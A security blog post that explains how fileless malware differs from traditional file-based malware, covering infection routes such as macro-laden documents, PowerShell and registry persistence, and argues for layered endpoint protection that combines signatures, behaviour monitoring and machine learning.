- Get link
- X
- Other Apps
- Get link
- X
- Other Apps
Companies that opt for digitalization not only gain in agility, they also optimize their budgets while boosting their competitiveness. Despite this performance, the adoption of new technologies also extends the attack surfaces that cybercriminals can exploit to spread their threats and compromise the overall security of companies.
Threats were traditionally designed to silently run independent applications on victims' computers, to compromise the integrity of existing applications, changing their behavior. To combat traditional malware, endpoint security solutions incorporate technologies designed to scan files stored on disk before they are executed.
Traditional malware vs. malware without files
Some of the more common attack techniques involve downloading a malicious application by the victim, which then runs to monitor their behavior, or exploit the vulnerability of installed software, to download additional components, and to execute them without the victim knowing.
Traditional threats must therefore access the victim's disk, before executing the malicious code. Signature-based detection was created precisely for this reason, as it can identify a file known to be malicious and prevent it from being saved or executed on a machine. However, new mechanisms such as encryption, obfuscation, or polymorphism have made traditional detection technologies much less effective, with cybercriminals now being able to manipulate the appearance of files for each victim, as well as rendering the scan of their code more difficult by security scan engines.
Classic, file-based malware is typically aimed at illegally accessing an operating system and its binaries by creating or unzipping additional files and dependencies, such as .dll, .sys, or .exe files, having different functions.
They can also install as drivers or rootkits to take full control of the operating system if they can successfully use a valid digital certificate that allows them not to trigger file-based endpoint security technologies. . For example, the highly sophisticated Stuxnet malware, designed to infiltrate a particular target while being persistent, is a prime example. With a digital signature, its different modules allowed it to spread silently from one victim to another until it reached its target.
Fileless malware is completely different from traditional malware in the way it executes malicious code and evades conventional detection technologies. As the name suggests, fileless malware does not need to save a file to disk to run. The malicious code can be executed directly in the memory of the infected machine, which means that it will disappear after a system restart. However, cybercriminals have devised different techniques that combine the capabilities of fileless attacks with persistence. For example, malicious code placed in registry entries and executed each time you restart Windows can combine stealth and persistence.
The use of scripts, shellcodes, and even encoded binaries is not uncommon for fileless malware exploiting registry entries, as traditional endpoint security systems are generally unable to parse scripts. Since traditional security tools and technologies focus on analyzing static files, fileless attacks can remain on a machine for a very long time before being detected.
The main difference between classic malware and fileless malware is where its components are located, stored, and executed. Fileless malware is increasingly popular with cybercriminals who have managed to evade file scanning technologies while maintaining stealth and persistence.
Mechanisms of infection
While both types of attack rely on the same infection mechanisms, such as infected email attachments or drive-by downloads that exploit vulnerabilities in web browsers or common software, fileless malware typically uses scripts and can exploit legitimate applications to execute commands. For example, scripts attached to trapped Word documents can be executed automatically by PowerShell, which is a native Windows tool. The resulting commands can then send detailed information to the attacker about the victim's system or download a silent payload that a local security solution cannot detect.
This type of attack can also involve a malicious URL redirecting the user to a website that will exploit a vulnerability in Java to run a PowerShell script. The script itself is just a series of legitimate commands that can download and run a binary directly into memory. A typical file scanning security mechanism will not detect the threat.
These pernicious attacks typically target specific organizations and businesses to cover up data infiltration and exfiltration.
The next generation of endpoint security platforms
The latest endpoint security platforms typically combine multi-level protection, i.e. file scanning and behavior monitoring, with machine learning technologies and a sandbox system for threat detection. Some technologies rely solely on machine learning algorithms - a single level of protection - while other endpoint protection platforms use technologies that encompass multiple layers of protection, enhanced by machine learning. The algorithms are then dedicated to the detection of advanced and sophisticated threats during the pre-execution, execution, and post-execution phases.
Today, a common mistake is to think of machine learning as an autonomous level of security capable of detecting any type of threat. An endpoint protection platform that relies solely on machine learning will not be able to enhance the security of an enterprise.
Machine learning algorithms are designed to strengthen the various layers of security, not to replace them. The filtering spam can for example be strengthened by the use of Machine Learning models, like traditional malware detection can be used to determine if unknown files may be malicious.
Signature unsigned security layers are designed to provide more protection, visibility, and control for the prevention, detection, and blocking of all types of threats. Given these new attack modes, the security platforms for Next-Gen endpoint must imperatively protect users against tools and techniques exploiting known unpatched vulnerabilities, and of course unknown vulnerabilities, of applications.
We will stress, however, that traditional signature-based technologies are not obsolete and should not be scrapped.
Find the best free antivirus software to prevent fileless malware
By being able to quickly and accurately identify a file known to be malicious, they provide an important layer of security. The combination of machine learning, signature-based, and behavioral-based security layers creates security solutions that can manage known malware, but also tackle unknown threats to enhance business security.
- Get link
- X
- Other Apps
Comments
Post a Comment